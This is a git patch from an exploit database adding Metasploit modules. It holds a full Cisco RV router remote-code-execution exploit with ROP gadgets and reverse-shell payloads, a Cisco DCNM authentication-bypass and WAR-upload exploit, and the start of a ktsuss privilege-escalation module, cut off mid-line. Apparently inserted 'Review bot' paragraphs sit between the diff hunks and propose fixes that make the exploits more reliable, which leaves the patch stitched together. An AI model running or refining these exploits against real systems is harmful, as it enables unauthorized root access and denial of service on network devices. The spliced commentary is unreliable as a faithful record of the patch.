From a26ef1328e0b3eb9ff26ceb93b57335e705ade7e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 4 Sep 2019 05:02:30 +0000 Subject: [PATCH] DB: 2019-09-04 6 changes to exploits/shellcodes ktsuss 1.4 - suid Privilege Escalation (Metasploit) ptrace - Sudo Token Privilege Escalation (Metasploit) Cisco UCS Director - default scpuser password (Metasploit) Cisco Data Center Network Manager - Unauthenticated Remote Code Execution (Metasploit) Cisco RV110W/RV130(W)/RV215W Routers Management Interface - Remote Command Execution (Metasploit) FileThingie 2.5.7 - Arbitrary File Upload --- exploits/hardware/remote/47348.rb | 423 ++++++++++++++++++++++++++++++ exploits/java/remote/47347.rb | 280 ++++++++++++++++++++ exploits/linux/local/47344.rb | 142 ++++++++++ exploits/linux/local/47345.rb | 213 +++++++++++++++ exploits/php/webapps/47349.txt | 153 +++++++++++ exploits/unix/remote/47346.rb | 139 ++++++++++ files_exploits.csv | 6 + 7 files changed, 1356 insertions(+) create mode 100755 exploits/hardware/remote/47348.rb create mode 100755 exploits/java/remote/47347.rb create mode 100755 exploits/linux/local/47344.rb create mode 100755 exploits/linux/local/47345.rb create mode 100644 exploits/php/webapps/47349.txt create mode 100755 exploits/unix/remote/47346.rb diff --git a/exploits/hardware/remote/47348.rb b/exploits/hardware/remote/47348.rb new file mode 100755 index 000000000..c10ee4b52 --- /dev/null +++ b/exploits/hardware/remote/47348.rb 
@@ -0,0 +1,423 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +# linux/armle/meterpreter/bind_tcp -> segfault +# linux/armle/meterpreter/reverse_tcp -> segfault +# linux/armle/meterpreter_reverse_http -> works +# linux/armle/meterpreter_reverse_https -> works +# linux/armle/meterpreter_reverse_tcp -> works +# linux/armle/shell/bind_tcp -> segfault +# linux/armle/shell/reverse_tcp -> segfault +# linux/armle/shell_bind_tcp -> segfault +# linux/armle/shell_reverse_tcp -> segfault +# +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + include Msf::Exploit::Deprecated + + moved_from 'exploit/linux/http/cisco_rv130_rmi_rce' + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Cisco RV110W/RV130(W)/RV215W Routers Management Interface Remote Command Execution', + 'Description' => %q{ + A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, + Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router + could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. + + The vulnerability is due to improper validation of user-supplied data in the web-based management interface. + An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. + + A successful exploit could allow the attacker to execute arbitrary code on the underlying operating + system of the affected device as a high-privilege user. + + RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected. + RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected. + RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected. 
+ + Note: successful exploitation may not result in a session, and as such, + on_new_session will never repair the HTTP server, leading to a denial-of-service condition. + }, + 'Author' => + [ + 'Yu Zhang', # Initial discovery (GeekPwn conference) + 'Haoliang Lu', # Initial discovery (GeekPwn conference) + 'T. Shiomitsu', # Initial discovery (Pen Test Partners) + 'Quentin Kaiser ' # Vulnerability analysis & exploit dev + ], + 'License' => MSF_LICENSE, + 'Platform' => %w[linux], + 'Arch' => [ARCH_ARMLE, ARCH_MIPSLE], + 'SessionTypes' => %w[meterpreter], + 'CmdStagerFlavor' => %w{ wget }, + 'Privileged' => true, # BusyBox + 'References' => + [ + ['CVE', '2019-1663'], + ['BID', '107185'], + ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'], + ['URL', 'https://www.pentestpartners.com/security-blog/cisco-rv130-its-2019-but-yet-strcpy/'] + ], + 'DefaultOptions' => { + 'WfsDelay' => 10, + 'SSL' => true, + 'RPORT' => 443, + 'CMDSTAGER::FLAVOR' => 'wget', + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + }, + 'Targets' => + [ + [ 'Cisco RV110W 1.1.0.9', + { + 'offset' => 69, + 'libc_base_addr' => 0x2af06000, + 'libcrypto_base_addr' => 0x2ac01000, + 'system_offset' => 0x00050d40, + 'got_offset' => 0x0009d560, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x00167c8c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV110W 1.2.0.9', + { + 'offset' => 69, + 'libc_base_addr' => 0x2af08000, + 'libcrypto_base_addr' => 0x2ac03000, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x00098db0, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x00167c4c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV110W 1.2.0.10', 
+ { + 'offset' => 69, + 'libc_base_addr' => 0x2af09000, + 'libcrypto_base_addr' => 0x2ac04000, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x00098db0, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV110W 1.2.1.4', + { + 'offset' => 69, + 'libc_base_addr' => 0x2af54000, + 'libcrypto_base_addr' => 0x2ac4f000, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x00098db0, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV110W 1.2.1.7', + { + 'offset' => 69, + 'libc_base_addr' => 0x2af98000, + 'libcrypto_base_addr' => 0x2ac4f000, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x00098db0, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV130/RV130W < 1.0.3.45', + { + 'offset' => 446, + 'libc_base_addr' => 0x357fb000, + 'system_offset' => 0x0004d144, + 'gadget1' => 0x00020e79, # pop {r2, r6, pc}; + 'gadget2' => 0x00041308, # mov r0, sp; blx r2; + 'Arch' => ARCH_ARMLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp', + } + }, + ], + [ 'Cisco RV215W 1.1.0.5', + { + 'offset' => 69, + 'libc_base_addr' => 0x2af59000, + 'libcrypto_base_addr' => 0x2ac54000, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x00098db0, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 
'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV215W 1.1.0.6', + { + 'offset' => 69, + 'libc_base_addr' => 0x2af59000, + 'libcrypto_base_addr' => 0x2ac54000, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x00098db0, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV215W 1.2.0.14', + { + 'offset' => 69, + 'libc_base_addr' => 0x2af5f000, + 'libcrypto_base_addr' => 0x2ac5a001, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x00098db0, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV215W 1.2.0.15', + { + 'offset' => 69, + 'libc_base_addr' => 0x2af5f000, + 'libcrypto_base_addr' => 0x2ac5a000, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x00098db0, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV215W 1.3.0.7', + { + 'offset' => 77, + 'libc_base_addr' => 0x2afeb000, + 'libcrypto_base_addr' => 0x2aca5000, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x000a0530, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x00057bec, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV215W 1.3.0.8', + { + 'offset' => 77, + 'libc_base_addr' => 0x2afee000, + 'libcrypto_base_addr' => 0x2aca5000, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x000a0530, + # gadget 1 is in 
/usr/lib/libcrypto.so + 'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + ], + 'DisclosureDate' => 'Feb 27 2019', + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [ CRASH_SERVICE_DOWN, ], + }, + )) + end + + def p(lib, offset) + [(lib + offset).to_s(16)].pack('H*').reverse + end + + def prepare_shellcode(cmd) + case target + # RV110W 1.1.0.9, 1.2.0.9, 1.2.0.10, 1.2.1.4, 1.2.1.7 + # RV215W 1.1.0.5, 1.1.0.6, 1.2.0.14, 1.2.0.15, 1.3.0.7, 1.3.0.8 + when targets[0], targets[1], targets[2], targets[3], targets[4], targets[6], targets[7], targets[8], targets[9], targets[10], targets[11] + shellcode = rand_text_alpha(target['offset']) + # filler + rand_text_alpha(4) + # $s0 + rand_text_alpha(4) + # $s1 + rand_text_alpha(4) + # $s2 + rand_text_alpha(4) + # $s3 + p(target['libc_base_addr'], target['system_offset']) + # $s4 + rand_text_alpha(4) + # $s5 + rand_text_alpha(4) + # $s6 + rand_text_alpha(4) + # $s7 + rand_text_alpha(4) + # $s8 + p(target['libcrypto_base_addr'], target['gadget1']) + # $ra + p(target['libc_base_addr'], target['got_offset']) + + rand_text_alpha(28) + + cmd + shellcode + when targets[5] # RV130/RV130W + shellcode = rand_text_alpha(target['offset']) + # filler + p(target['libc_base_addr'], target['gadget1']) + + p(target['libc_base_addr'], target['system_offset']) + # r2 + rand_text_alpha(4) + # r6 + p(target['libc_base_addr'], target['gadget2']) + # pc + cmd + shellcode + end + end + + def send_request(buffer) + begin + send_request_cgi({ + 'uri' => '/login.cgi', + 'method' => 'POST', + 'vars_post' => { + "submit_button": "login", + "submit_type": "", + "gui_action": "", + "wait_time": 0, + "change_action": "", + "enc": 1, + "user": rand_text_alpha_lower(5), + "pwd": buffer, + "sel_lang": "EN" + } + }) + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to 
connect to the router") + end + end + + def check + + # We fingerprint devices using SHA1 hash of a web resource accessible to unauthenticated users. + # We use lang_pack/EN.js because it's the one file that changes the most between versions. + # Note that it's not a smoking gun given that some branches keep the exact same files in /www + # (see RV110 branch 1.2.1.x/1.2.2.x, RV130 > 1.0.3.22, RV215 1.2.0.x/1.3.x) + + fingerprints = { + "69d906ddd59eb6755a7b9c4f46ea11cdaa47c706" => { + "version" => "Cisco RV110W 1.1.0.9", + "status" =>Exploit::CheckCode::Vulnerable + }, + "8d3b677d870425198f7fae94d6cfe262551aa8bd" => { + "version" => "Cisco RV110W 1.2.0.9", + "status" => Exploit::CheckCode::Vulnerable + }, + "134ee643ec877641030211193a43cc5e93c96a06" => { + "version" => "Cisco RV110W 1.2.0.10", + "status" => Exploit::CheckCode::Vulnerable + }, + "e3b2ec9d099a3e3468f8437e5247723643ff830e" => { + "version" => "Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)", + "status" => Exploit::CheckCode::Unknown + }, + "6b7b1e8097e8dda26db27a09b8176b9c32b349b3" => { + "version" => "Cisco RV130/RV130W 1.0.0.21", + "status" => Exploit::CheckCode::Vulnerable + }, + "9b1a87b752d11c5ba97dd80d6bae415532615266" => { + "version" => "Cisco RV130/RV130W 1.0.1.3", + "status" => Exploit::CheckCode::Vulnerable + }, + "9b6399842ef69cf94409b65c4c61017c862b9d09" => { + "version" => "Cisco RV130/RV130W 1.0.2.7", + "status" => Exploit::CheckCode::Vulnerable + }, + "8680ec6df4f8937acd3505a4dd36d40cb02c2bd6" => { + "version" => "Cisco RV130/RV130W 1.0.3.14, 1.0.3.16", + "status" => Exploit::CheckCode::Vulnerable + }, + "8c8e05de96810a02344d96588c09b21c491ede2d" => { + "version" => "Cisco RV130/RV130W 1.0.3.22, 1.0.3.28, 1.0.3.44, 1.0.3.45 (not vulnerable), 1.0.3.51 (not vulnerable)", + "status" => Exploit::CheckCode::Unknown + }, + "2f29a0dfa78063d643eb17388e27d3f804ff6765" => { + "version" => "Cisco RV215W 1.1.0.5", + "status" => Exploit::CheckCode::Vulnerable + }, 
+ "e5cc84d7c9c2d840af85d5f25cee33baffe3ca6f" => { + "version" => "Cisco RV215W 1.1.0.6", + "status" => Exploit::CheckCode::Vulnerable + }, + "7cc8fcce5949a68c31641c38255e7f6ed31ff4db" => { + "version" => "Cisco RV215W 1.2.0.14 or 1.2.0.15", + "status" => Exploit::CheckCode::Vulnerable + }, + "050d47ea944eaeadaec08945741e8e380f796741" => { + "version" => "Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1 (not vulnerable), 1.3.1.4 (not vulnerable)", + "status" => Exploit::CheckCode::Unknown + } + } + + uri = target_uri.path + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'lang_pack/EN.js') + }) + if res && res.code == 200 + fingerprint = Digest::SHA1.hexdigest("#{res.body.to_s}") + if fingerprints.key?(fingerprint) + print_good("Successfully identified device: #{fingerprints[fingerprint]["version"]}") + return fingerprints[fingerprint]["status"] + else + print_status("Couldn't reliably fingerprint the target.") + end + end + Exploit::CheckCode::Unknown + end + + def exploit + print_status('Sending request') + execute_cmdstager + end + + def execute_command(cmd, opts = {}) + shellcode = prepare_shellcode(cmd.to_s) + send_request(shellcode) + end + + def on_new_session(session) + # Given there is no process continuation here, the httpd server will stop + # functioning properly and we need to take care of proper restart + # ourselves. + print_status("Reloading httpd service") + reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S" + if session.type.to_s.eql? 'meterpreter' + session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' + session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\"" + else + session.shell_command(reload_httpd_service) + end + ensure + super + end +end \ No newline at end of file diff --git a/exploits/java/remote/47347.rb b/exploits/java/remote/47347.rb new file mode 100755 index 000000000..d1d930f6f --- /dev/null +++ b/exploits/java/remote/47347.rb 
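Review bot: The 'Cisco RV215W 1.2.0.14' target sets `'libcrypto_base_addr' => 0x2ac5a001`, the only library base in the whole target table that is not page-aligned (its 1.2.0.15 sibling uses `0x2ac5a000`), so the `$ra` pointer built by `p(target['libcrypto_base_addr'], target['gadget1'])` would land on an odd address and a MIPS instruction fetch there faults instead of running the chain; this looks like a typo that should be confirmed against the firmware and corrected to `'libcrypto_base_addr' => 0x2ac5a000,`. Relatedly, `p(lib, offset)` encodes the pointer by going through a hex string and `pack('H*')`, which silently mis-encodes any sum whose hex form has an odd number of digits; `[lib + offset].pack('V')` is the conventional little-endian form and has no such edge case. The `check` method returns `CheckCode::Unknown` for the SHA1 buckets shared by patched and unpatched builds, which is correct, but the three `(not vulnerable)` entries would be clearer to an operator if the printed string also said which firmware is fixed, e.g. a trailing `# fixed in 1.2.2.1` comment on the RV110W bucket and likewise for the RV130 and RV215W ones. Note that a successful run always ends in `on_new_session` issuing `killall httpd`, and per the module's own description a run that yields no session leaves the management interface down, so `CRASH_SERVICE_DOWN` is the right stability note and the header comment should be kept in sync if the ARM payload list changes.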
@@ -0,0 +1,280 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Cisco Data Center Network Manager Unauthenticated Remote Code Execution', + 'Description' => %q{ + DCNM exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload. + An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps + directory and achieve remote code execution as root. + This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on + versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct + directory for the WAR file upload. + This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should + work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit + (see References to understand why). 
+ }, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2019-1619' ], # auth bypass + [ 'CVE', '2019-1620' ], # file upload + [ 'CVE', '2019-1622' ], # log download + [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass' ], + [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ], + [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ], + [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_upload_2019.rb' ], + [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jul/7' ] + ], + 'Platform' => 'java', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'Automatic', {} ], + [ + 'Cisco DCNM 11.1(1)', {} + ], + [ + 'Cisco DCNM 11.0(1)', {} + ], + [ + 'Cisco DCNM 10.4(2)', {} + ] + ], + 'Privileged' => true, + 'DefaultOptions' => { 'WfsDelay' => 10 }, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jun 26 2019' + )) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Connect with TLS', true]), + OptString.new('TARGETURI', [true, "Default server path", '/']), + OptString.new('USERNAME', [true, "Username for auth (required only for 11.0(1) and above", 'admin']), + OptString.new('PASSWORD', [true, "Password for auth (required only for 11.0(1) and above", 'admin']), + ]) + end + + def check + # at the moment this is the best way to detect + # check if pmreport and fileUpload servlets return a 500 error with no params + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'fm', 'pmreport'), + 'vars_get' => + { + 'token' => rand_text_alpha(5..20) + }, + 'method' => 'GET' + ) + if res && res.code == 500 + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'fm', 'fileUpload'), + 'method' => 'GET', + ) + if res && res.code == 500 + 
return CheckCode::Detected + end + end + + CheckCode::Unknown + end + + def target_select + if target != targets[0] + return target + else + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'fm', 'fmrest', 'about','version'), + 'method' => 'GET' + ) + if res && res.code == 200 + if res.body.include?('version":"11.1(1)') + print_good("#{peer} - Detected DCNM 11.1(1)") + print_status("#{peer} - No authentication required, ready to exploit!") + return targets[1] + elsif res.body.include?('version":"11.0(1)') + print_good("#{peer} - Detected DCNM 11.0(1)") + print_status("#{peer} - Note that 11.0(1) requires valid authentication credentials to exploit") + return targets[2] + elsif res.body.include?('version":"10.4(2)') + print_good("#{peer} - Detected DCNM 10.4(2)") + print_status("#{peer} - No authentication required, ready to exploit!") + return targets[3] + else + print_error("#{peer} - Failed to detect target version.") + print_error("Please contact module author or add the target yourself and submit a PR to the Metasploit project!") + print_error(res.body) + print_status("#{peer} - We will proceed assuming the version is below 10.4(2) and vulnerable to auth bypass") + return targets[3] + end + end + fail_with(Failure::NoTarget, "#{peer} - Failed to determine target") + end + end + + def auth_v11 + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'fm/'), + 'method' => 'GET', + 'vars_get' => + { + 'userName' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + }, + ) + + if res && res.code == 200 + # get the JSESSIONID cookie + if res.get_cookies + res.get_cookies.split(';').each do |cok| + if cok.include?("JSESSIONID") + return cok + end + end + end + end + end + + def auth_v10 + # step 1: get a JSESSIONID cookie and the server Date header + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'fm/'), + 'method' => 'GET' + ) + + # step 2: convert the Date header and create the auth hash + if res && 
res.headers['Date'] + jsession = res.get_cookies.split(';')[0] + date = Time.httpdate(res.headers['Date']) + server_date = date.strftime("%s").to_i * 1000 + print_good("#{peer} - Got sysTime value #{server_date.to_s}") + + # auth hash format: + # username + sessionId + sysTime + POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF + session_id = rand(1000..50000).to_s + md5 = Digest::MD5.digest 'admin' + session_id + server_date.to_s + + "POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF" + md5_str = Base64.strict_encode64(md5) + + # step 3: authenticate our cookie as admin + # token format: sessionId.sysTime.md5_str.username + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'fm', 'pmreport'), + 'cookie' => jsession, + 'vars_get' => + { + 'token' => "#{session_id}.#{server_date.to_s}.#{md5_str}.admin" + }, + 'method' => 'GET' + ) + + if res && res.code == 500 + return jsession + end + end + end + + # use CVE-2019-1622 to fetch the logs unauthenticated, and get the WAR upload path from jboss*.log + def get_war_path + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'fm', 'log', 'fmlogs.zip'), + 'method' => 'GET' + ) + + if res && res.code == 200 + tmp = Tempfile.new + # we have to drop this into a file first + # else we will get a Zip::GPFBit3Error if we use an InputStream + File.binwrite(tmp, res.body) + Zip::File.open(tmp) do |zis| + zis.each do |entry| + if entry.name =~ /jboss[0-9]*\.log/ + fdata = zis.read(entry) + if fdata[/Started FileSystemDeploymentService for directory ([\w\/\\\-\.:]*)/] + tmp.close + tmp.unlink + return $1.strip + end + end + end + end + end + end + + + def exploit + target = target_select + + if target == targets[2] + jsession = auth_v11 + elsif target == targets[3] + jsession = auth_v10 + end + + # targets[1] DCNM 11.1(1) doesn't need auth! + if jsession.nil? 
&& target != targets[1] + fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate JSESSIONID cookie") + elsif target != targets[1] + print_good("#{peer} - Successfully authenticated our JSESSIONID cookie") + end + + war_path = get_war_path + if war_path.nil? or war_path.empty? + fail_with(Failure::Unknown, "#{peer} - Failed to get WAR path from logs") + else + print_good("#{peer} - Obtain WAR path from logs: #{war_path}") + end + + # Generate our payload... and upload it + app_base = rand_text_alphanumeric(6..16) + war_payload = payload.encoded_war({ :app_name => app_base }).to_s + + fname = app_base + '.war' + post_data = Rex::MIME::Message.new + post_data.add_part(fname, nil, nil, content_disposition = "form-data; name=\"fname\"") + post_data.add_part(war_path, nil, nil, content_disposition = "form-data; name=\"uploadDir\"") + post_data.add_part(war_payload, + "application/octet-stream", 'binary', + "form-data; name=\"#{rand_text_alpha(5..20)}\"; filename=\"#{rand_text_alpha(6..10)}\"") + data = post_data.to_s + + print_status("#{peer} - Uploading payload...") + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'fm', 'fileUpload'), + 'method' => 'POST', + 'data' => data, + 'cookie' => jsession, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" + ) + + if res && res.code == 200 && res.body[/#{fname}/] + print_good("#{peer} - WAR uploaded, waiting a few seconds for deployment...") + + sleep 10 + + print_status("#{peer} - Executing payload...") + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, app_base), + 'method' => 'GET' + ) + else + fail_with(Failure::Unknown, "#{peer} - Failed to upload WAR file") + end + end +end \ No newline at end of file diff --git a/exploits/linux/local/47344.rb b/exploits/linux/local/47344.rb new file mode 100755 index 000000000..df09d2abf --- /dev/null +++ b/exploits/linux/local/47344.rb 
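Review bot: `Msf::Exploit::FileDropper` is included but `exploit` never registers the uploaded WAR, so `#{war_path}/#{fname}` is left deployed on the target after the session closes; add `register_files_for_cleanup("#{war_path}/#{fname}")` right after the `WAR uploaded` success branch so the module cleans up like the other FileDropper users in this commit. In `get_war_path` the `Tempfile` is only closed and unlinked on the path where the `Started FileSystemDeploymentService` regex matches; if no `jboss*.log` entry is present or the pattern does not match, the temp file is left for the finalizer — wrap the `Zip::File.open` block in `begin ... ensure tmp.close; tmp.unlink end` so the file is removed on every exit path. The 'References' list contains the `cisco-sa-20190626-dcnm-codex` URL twice while CVE-2019-1622 (the log-download disclosure the module relies on) has no advisory URL; the second entry is presumably meant to point at that advisory and should be checked. Minor wording: `Obtain WAR path from logs` should read `Obtained WAR path from logs`.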
@@ -0,0 +1,142 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ktsuss suid Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges by exploiting + a vulnerability in ktsuss versions 1.4 and prior. + + The ktsuss executable is setuid root and does not drop + privileges prior to executing user specified commands, + resulting in command execution with root privileges. + + This module has been tested successfully on: + + ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and + ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'John Lightsey', # Discovery and exploit + 'bcoles' # Metasploit + ], + 'DisclosureDate' => '2011-08-13', + 'References' => + [ + ['CVE', '2011-2921'], + ['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'], + ['URL', 'https://security.gentoo.org/glsa/201201-15'], + ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh'] + ], + 'Platform' => ['linux'], + 'Arch' => + [ + ARCH_X86, + ARCH_X64, + ARCH_ARMLE, + ARCH_AARCH64, + ARCH_PPC, + ARCH_MIPSLE, + ARCH_MIPSBE + ], + 'SessionTypes' => ['shell', 'meterpreter'], + 'Targets' => [['Auto', {}]], + 'DefaultOptions' => + { + 'AppendExit' => true, + 'PrependSetresuid' => true, + 'PrependSetresgid' => true, + 'PrependSetreuid' => true, + 'PrependSetuid' => true, + 'PrependFork' => true + }, + 'DefaultTarget' => 0)) + register_options [ + OptString.new('KTSUSS_PATH', [true, 'Path to staprun executable', '/usr/bin/ktsuss']) + ] + register_advanced_options [ + 
OptBool.new('ForceExploit', [false, 'Override check result', false]), + OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) + ] + end + + def ktsuss_path + datastore['KTSUSS_PATH'] + end + + def base_dir + datastore['WritableDir'].to_s + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + register_file_for_cleanup path + end + + def upload_and_chmodx(path, data) + upload path, data + chmod path + end + + def check + unless setuid? ktsuss_path + vprint_error "#{ktsuss_path} is not setuid" + return CheckCode::Safe + end + vprint_good "#{ktsuss_path} is setuid" + + id = cmd_exec 'whoami' + res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s + vprint_status res + + unless res.include? 'uid=0' + return CheckCode::Safe + end + + CheckCode::Vulnerable + end + + def exploit + unless check == CheckCode::Vulnerable + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + if is_root? + unless datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' + end + end + + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + payload_name = ".#{rand_text_alphanumeric 10..15}" + payload_path = 